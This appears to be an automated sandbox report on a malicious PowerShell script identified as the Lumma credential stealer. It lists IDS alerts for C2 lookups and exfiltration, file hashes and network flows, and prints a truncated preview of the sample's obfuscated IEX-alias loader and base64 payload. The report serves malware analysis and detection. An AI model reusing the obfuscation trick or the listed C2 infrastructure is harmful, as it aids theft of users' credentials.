104.102.49.254 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | false |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1591131 |
Start date and time: | 2025-01-14 18:00:13 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 8s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 15 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: | |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 62.122.184.98 (3).ps1 |
Detection: | MAL |
Classification: | mal100.troj.spyw.evad.winPS1@8/5@10/2 |
EGA Information: | |
HCA Information: | |
Cookbook Comments: | |
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56
- Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
- Not all processes were analyzed; the report is missing behavior information
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description |
---|---|---|
12:01:08 | API Interceptor | |
12:01:09 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
188.114.97.3 | Get hash | malicious | FormBook, PureLog Stealer | Browse |
| Get hash | malicious | Unknown | Browse |
| Get hash | malicious | Unknown | Browse |
| Get hash | malicious | FormBook | Browse |
| Get hash | malicious | FormBook | Browse |
| Get hash | malicious | FormBook | Browse |
| Get hash | malicious | FormBook | Browse |
| Get hash | malicious | FormBook | Browse |
| Get hash | malicious | FormBook | Browse |
| Get hash | malicious | FormBook | Browse |
104.102.49.254 | Get hash | malicious | Socks5Systemz | Browse |
| Get hash | malicious | Unknown | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
aleksandr-block.com | Get hash | malicious | LummaC | Browse |
| Get hash | malicious | LummaC | Browse |
| Get hash | malicious | LummaC | Browse |
| Get hash | malicious | LummaC | Browse |
| Get hash | malicious | LummaC | Browse |
steamcommunity.com | Get hash | malicious | LummaC | Browse |
| Get hash | malicious | LummaC | Browse |
| Get hash | malicious | LummaC | Browse |
| Get hash | malicious | LummaC | Browse |
| Get hash | malicious | LummaC | Browse |
| Get hash | malicious | LummaC | Browse |
| Get hash | malicious | LummaC | Browse |
| Get hash | malicious | LummaC | Browse |
| Get hash | malicious | LummaC | Browse |
| Get hash | malicious | LummaC | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
CLOUDFLARENETUS | Get hash | malicious | LummaC | Browse |
| Get hash | malicious | HTMLPhisher | Browse |
| Get hash | malicious | HTMLPhisher | Browse |
| Get hash | malicious | Unknown | Browse |
| Get hash | malicious | Unknown | Browse |
| Get hash | malicious | HTMLPhisher | Browse |
| Get hash | malicious | HTMLPhisher | Browse |
| Get hash | malicious | Unknown | Browse |
| Get hash | malicious | HTMLPhisher | Browse |
| Get hash | malicious | HTMLPhisher | Browse |
AKAMAI-ASUS | Get hash | malicious | HTMLPhisher | Browse |
| Get hash | malicious | AteraAgent | Browse |
| Get hash | malicious | Mirai | Browse |
| Get hash | malicious | Mirai | Browse |
| Get hash | malicious | Unknown | Browse |
| Get hash | malicious | Unknown | Browse |
| Get hash | malicious | Unknown | Browse |
| Get hash | malicious | Unknown | Browse |
| Get hash | malicious | HTMLPhisher | Browse |
| Get hash | malicious | Mirai | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
a0e9f5d64349fb13191bc781f81f42e1 | Get hash | malicious | LummaC | Browse |
| Get hash | malicious | LummaC | Browse |
| Get hash | malicious | LummaC, PureLog Stealer | Browse |
| Get hash | malicious | LummaC | Browse |
| Get hash | malicious | Unknown | Browse |
| Get hash | malicious | Unknown | Browse |
| Get hash | malicious | Unknown | Browse |
| Get hash | malicious | Unknown | Browse |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:NlllulXg+//lz:NllUwu/l |
MD5: | ED0FF51DEEE7DB96EC9C5624C12E0A04 |
SHA1: | 515B7FC63DB9F9313A6AEE6B4A6266B0FB6FF3A7 |
SHA-256: | B93B1F8411ACBB11CBECF0F4E344D7D6D3551801BD891B816FB4720E60CE357B |
SHA-512: | FD82F7D0B1B6F1641D2FF3F4EC6FEF66E2AB0F2048D7A5BBC674C379DD429516198FFD6E6E445C6EC1A2763ADAACF6288026B4A90697D86C8EED743A71F177ED |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3762TWKVDB5T2HC0WUS4.temp
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 6220 |
Entropy (8bit): | 3.7292965457861227 |
Encrypted: | false |
SSDEEP: | 48:yf+TePCg8oU2fvsPukvhkvklCywlgjJIIlL8sSogZoKDJIIl/8sSogZo+1:h6PCg84dkvhkvCCt4JIIkH/JIIEHF |
MD5: | 097D0312BBBE7C31421361F199D5E9DD |
SHA1: | B01619A92440857DB3D4A8E58B9226E1F003418B |
SHA-256: | 8C5C4BC4E512CC94723D84B5F9A3FE568A4EBAA8820A3990575607C99A0AD662 |
SHA-512: | A662CA12CB1B2E100EDC573FE1C544CC1A1DC285F83FE8129667BCA39CB499B6EC72986D9FCDAED366E9B0ED51C2AF988C03C8419D5FF70440D6C8CD11A0A349 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 6220 |
Entropy (8bit): | 3.7292965457861227 |
Encrypted: | false |
SSDEEP: | 48:yf+TePCg8oU2fvsPukvhkvklCywlgjJIIlL8sSogZoKDJIIl/8sSogZo+1:h6PCg84dkvhkvCCt4JIIkH/JIIEHF |
MD5: | 097D0312BBBE7C31421361F199D5E9DD |
SHA1: | B01619A92440857DB3D4A8E58B9226E1F003418B |
SHA-256: | 8C5C4BC4E512CC94723D84B5F9A3FE568A4EBAA8820A3990575607C99A0AD662 |
SHA-512: | A662CA12CB1B2E100EDC573FE1C544CC1A1DC285F83FE8129667BCA39CB499B6EC72986D9FCDAED366E9B0ED51C2AF988C03C8419D5FF70440D6C8CD11A0A349 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 5.491524367200651 |
TrID: | |
File name: | 62.122.184.98 (3).ps1 |
File size: | 537'125 bytes |
MD5: | 2b60655a425eaa036531f18e96741444 |
SHA1: | ffa85842df96dac9f6dac782cb1081251eaac749 |
SHA256: | 930a09e6ee090e9f2b67e1a37270b4c31e3cb4fdad55cd8db34b11519759f145 |
SHA512: | 42c0cb45071acb2a160888885937cf8fa541786384b5bf12b8803a61b7869f1afc45f94f2b2d138490c4079a8139bbbeec2a62c48615eb3877644de6a7da571a |
SSDEEP: | 12288:srScfYL0kaO7oNtiE45hXTLr1qwofa54+:1QNtobTL5ofk4+ |
TLSH: | 62B47D3141033C6E37AA2ECEA4006EC10C9D7997BB54D550AE899176B2BE13B4F6D9FC |
File Content Preview: | .. $t0='IQIQQIIQIQQEX'.replace('IQIQQ','');sal GG $t0;....$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDANfKUWcAAAAAAA |
Icon Hash: | 3270d6baae77db44 |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-14T18:01:09.868069+0100 | 2059137 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (littlenotii .biz) | 1 | 192.168.2.10 | 54196 | 1.1.1.1 | 53 | UDP |
2025-01-14T18:01:09.877880+0100 | 2059133 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fraggielek .biz) | 1 | 192.168.2.10 | 64828 | 1.1.1.1 | 53 | UDP |
2025-01-14T18:01:09.890771+0100 | 2059135 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grandiouseziu .biz) | 1 | 192.168.2.10 | 57637 | 1.1.1.1 | 53 | UDP |
2025-01-14T18:01:09.903271+0100 | 2059141 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (marketlumpe .biz) | 1 | 192.168.2.10 | 57333 | 1.1.1.1 | 53 | UDP |
2025-01-14T18:01:09.914056+0100 | 2059143 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (nuttyshopr .biz) | 1 | 192.168.2.10 | 54253 | 1.1.1.1 | 53 | UDP |
2025-01-14T18:01:09.924697+0100 | 2059145 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (punishzement .biz) | 1 | 192.168.2.10 | 57389 | 1.1.1.1 | 53 | UDP |
2025-01-14T18:01:09.936322+0100 | 2059151 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spookycappy .biz) | 1 | 192.168.2.10 | 62955 | 1.1.1.1 | 53 | UDP |
2025-01-14T18:01:09.947255+0100 | 2059153 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (truculengisau .biz) | 1 | 192.168.2.10 | 64010 | 1.1.1.1 | 53 | UDP |
2025-01-14T18:01:10.624646+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49704 | 104.102.49.254 | 443 | TCP |
2025-01-14T18:01:11.784193+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.10 | 49704 | 104.102.49.254 | 443 | TCP |
2025-01-14T18:01:12.372040+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49711 | 188.114.97.3 | 443 | TCP |
2025-01-14T18:01:13.123944+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.10 | 49711 | 188.114.97.3 | 443 | TCP |
2025-01-14T18:01:13.123944+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.10 | 49711 | 188.114.97.3 | 443 | TCP |
2025-01-14T18:01:13.594418+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49717 | 188.114.97.3 | 443 | TCP |
2025-01-14T18:01:14.083227+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.10 | 49717 | 188.114.97.3 | 443 | TCP |
2025-01-14T18:01:14.083227+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.10 | 49717 | 188.114.97.3 | 443 | TCP |
2025-01-14T18:01:14.833090+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49728 | 188.114.97.3 | 443 | TCP |
2025-01-14T18:01:16.415374+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49737 | 188.114.97.3 | 443 | TCP |
2025-01-14T18:01:17.485915+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49745 | 188.114.97.3 | 443 | TCP |
2025-01-14T18:01:18.529051+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49751 | 188.114.97.3 | 443 | TCP |
2025-01-14T18:01:18.991769+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.10 | 49751 | 188.114.97.3 | 443 | TCP |
2025-01-14T18:01:19.821171+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49761 | 188.114.97.3 | 443 | TCP |
2025-01-14T18:01:19.827392+0100 | 2843864 | ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 | 1 | 192.168.2.10 | 49761 | 188.114.97.3 | 443 | TCP |
2025-01-14T18:01:23.192598+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49782 | 188.114.97.3 | 443 | TCP |
2025-01-14T18:01:23.963228+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.10 | 49782 | 188.114.97.3 | 443 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 14, 2025 18:01:09.971975088 CET | 49704 | 443 | 192.168.2.10 | 104.102.49.254 |
Jan 14, 2025 18:01:09.972011089 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.10 |
Jan 14, 2025 18:01:09.972276926 CET | 49704 | 443 | 192.168.2.10 | 104.102.49.254 |
Jan 14, 2025 18:01:09.973572016 CET | 49704 | 443 | 192.168.2.10 | 104.102.49.254 |
Jan 14, 2025 18:01:09.973583937 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.10 |
Jan 14, 2025 18:01:10.624577045 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.10 |
Jan 14, 2025 18:01:10.624645948 CET | 49704 | 443 | 192.168.2.10 | 104.102.49.254 |
Jan 14, 2025 18:01:10.629590034 CET | 49704 | 443 | 192.168.2.10 | 104.102.49.254 |
Jan 14, 2025 18:01:10.629595995 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.10 |
Jan 14, 2025 18:01:10.629839897 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.10 |
Jan 14, 2025 18:01:10.677546978 CET | 49704 | 443 | 192.168.2.10 | 104.102.49.254 |
Jan 14, 2025 18:01:11.067842007 CET | 49704 | 443 | 192.168.2.10 | 104.102.49.254 |
Jan 14, 2025 18:01:11.111356974 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.10 |
Jan 14, 2025 18:01:11.784202099 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.10 |
Jan 14, 2025 18:01:11.784223080 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.10 |
Jan 14, 2025 18:01:11.784261942 CET | 49704 | 443 | 192.168.2.10 | 104.102.49.254 |
Jan 14, 2025 18:01:11.784275055 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.10 |
Jan 14, 2025 18:01:11.784302950 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.10 |
Jan 14, 2025 18:01:11.784317970 CET | 49704 | 443 | 192.168.2.10 | 104.102.49.254 |
Jan 14, 2025 18:01:11.784317970 CET | 49704 | 443 | 192.168.2.10 | 104.102.49.254 |
Jan 14, 2025 18:01:11.784324884 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.10 |
Jan 14, 2025 18:01:11.784332991 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.10 |
Jan 14, 2025 18:01:11.784359932 CET | 49704 | 443 | 192.168.2.10 | 104.102.49.254 |
Jan 14, 2025 18:01:11.784394026 CET | 49704 | 443 | 192.168.2.10 | 104.102.49.254 |
Jan 14, 2025 18:01:11.885795116 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.10 |
Jan 14, 2025 18:01:11.885819912 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.10 |
Jan 14, 2025 18:01:11.885905027 CET | 49704 | 443 | 192.168.2.10 | 104.102.49.254 |
Jan 14, 2025 18:01:11.885905027 CET | 49704 | 443 | 192.168.2.10 | 104.102.49.254 |
Jan 14, 2025 18:01:11.885914087 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.10 |
Jan 14, 2025 18:01:11.885984898 CET | 49704 | 443 | 192.168.2.10 | 104.102.49.254 |
Jan 14, 2025 18:01:11.890713930 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.10 |
Jan 14, 2025 18:01:11.890783072 CET | 49704 | 443 | 192.168.2.10 | 104.102.49.254 |
Jan 14, 2025 18:01:11.895344019 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.10 |
Jan 14, 2025 18:01:11.895402908 CET | 49704 | 443 | 192.168.2.10 | 104.102.49.254 |
Jan 14, 2025 18:01:11.895409107 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.10 |
Jan 14, 2025 18:01:11.895420074 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.10 |
Jan 14, 2025 18:01:11.895476103 CET | 49704 | 443 | 192.168.2.10 | 104.102.49.254 |
Jan 14, 2025 18:01:11.896020889 CET | 49704 | 443 | 192.168.2.10 | 104.102.49.254 |
Jan 14, 2025 18:01:11.896035910 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.10 |
Jan 14, 2025 18:01:11.896053076 CET | 49704 | 443 | 192.168.2.10 | 104.102.49.254 |
Jan 14, 2025 18:01:11.896058083 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.10 |
Jan 14, 2025 18:01:11.908797026 CET | 49711 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:11.908840895 CET | 443 | 49711 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:11.909486055 CET | 49711 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:11.909794092 CET | 49711 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:11.909806967 CET | 443 | 49711 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:12.371978045 CET | 443 | 49711 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:12.372040033 CET | 49711 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:12.373469114 CET | 49711 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:12.373475075 CET | 443 | 49711 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:12.373713017 CET | 443 | 49711 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:12.375015974 CET | 49711 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:12.375065088 CET | 49711 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:12.375073910 CET | 443 | 49711 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:13.123927116 CET | 443 | 49711 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:13.124011993 CET | 443 | 49711 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:13.124109983 CET | 49711 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:13.124636889 CET | 49711 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:13.124659061 CET | 443 | 49711 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:13.124670982 CET | 49711 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:13.124676943 CET | 443 | 49711 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:13.136827946 CET | 49717 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:13.136877060 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:13.136943102 CET | 49717 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:13.137213945 CET | 49717 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:13.137229919 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:13.594353914 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:13.594418049 CET | 49717 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:13.595927000 CET | 49717 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:13.595936060 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:13.596178055 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:13.597467899 CET | 49717 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:13.597493887 CET | 49717 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:13.597532034 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:14.083225965 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:14.083278894 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:14.083309889 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:14.083352089 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:14.083376884 CET | 49717 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:14.083408117 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:14.083420038 CET | 49717 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:14.083479881 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:14.083506107 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:14.083550930 CET | 49717 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:14.083559990 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:14.083664894 CET | 49717 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:14.084177971 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:14.088865042 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:14.088892937 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:14.088917971 CET | 49717 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:14.088922977 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:14.088937044 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:14.088984013 CET | 49717 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:14.170092106 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:14.170155048 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:14.170211077 CET | 49717 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:14.170238018 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:14.170253992 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:14.170301914 CET | 49717 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:14.170511961 CET | 49717 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:14.170528889 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:14.170537949 CET | 49717 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:14.170542955 CET | 443 | 49717 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:14.250034094 CET | 49728 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:14.250080109 CET | 443 | 49728 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:14.250375032 CET | 49728 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:14.251336098 CET | 49728 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:14.251358986 CET | 443 | 49728 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:14.832950115 CET | 443 | 49728 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:14.833090067 CET | 49728 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:14.834472895 CET | 49728 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:14.834481001 CET | 443 | 49728 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:14.834743023 CET | 443 | 49728 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:14.836106062 CET | 49728 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:14.836714983 CET | 49728 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:14.836764097 CET | 443 | 49728 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:15.765527964 CET | 443 | 49728 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:15.765614986 CET | 443 | 49728 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:15.765856028 CET | 49728 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:15.816546917 CET | 49728 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:15.816585064 CET | 443 | 49728 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:15.911277056 CET | 49737 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:15.911303043 CET | 443 | 49737 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:15.911362886 CET | 49737 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:15.911637068 CET | 49737 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:15.911652088 CET | 443 | 49737 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:16.415299892 CET | 443 | 49737 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:16.415374041 CET | 49737 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:16.417007923 CET | 49737 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:16.417023897 CET | 443 | 49737 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:16.417294025 CET | 443 | 49737 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:16.418683052 CET | 49737 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:16.418847084 CET | 49737 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:16.418888092 CET | 443 | 49737 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:16.418939114 CET | 49737 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:16.459331989 CET | 443 | 49737 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:16.909528017 CET | 443 | 49737 | 188.114.97.3 | 192.168.2.10 |
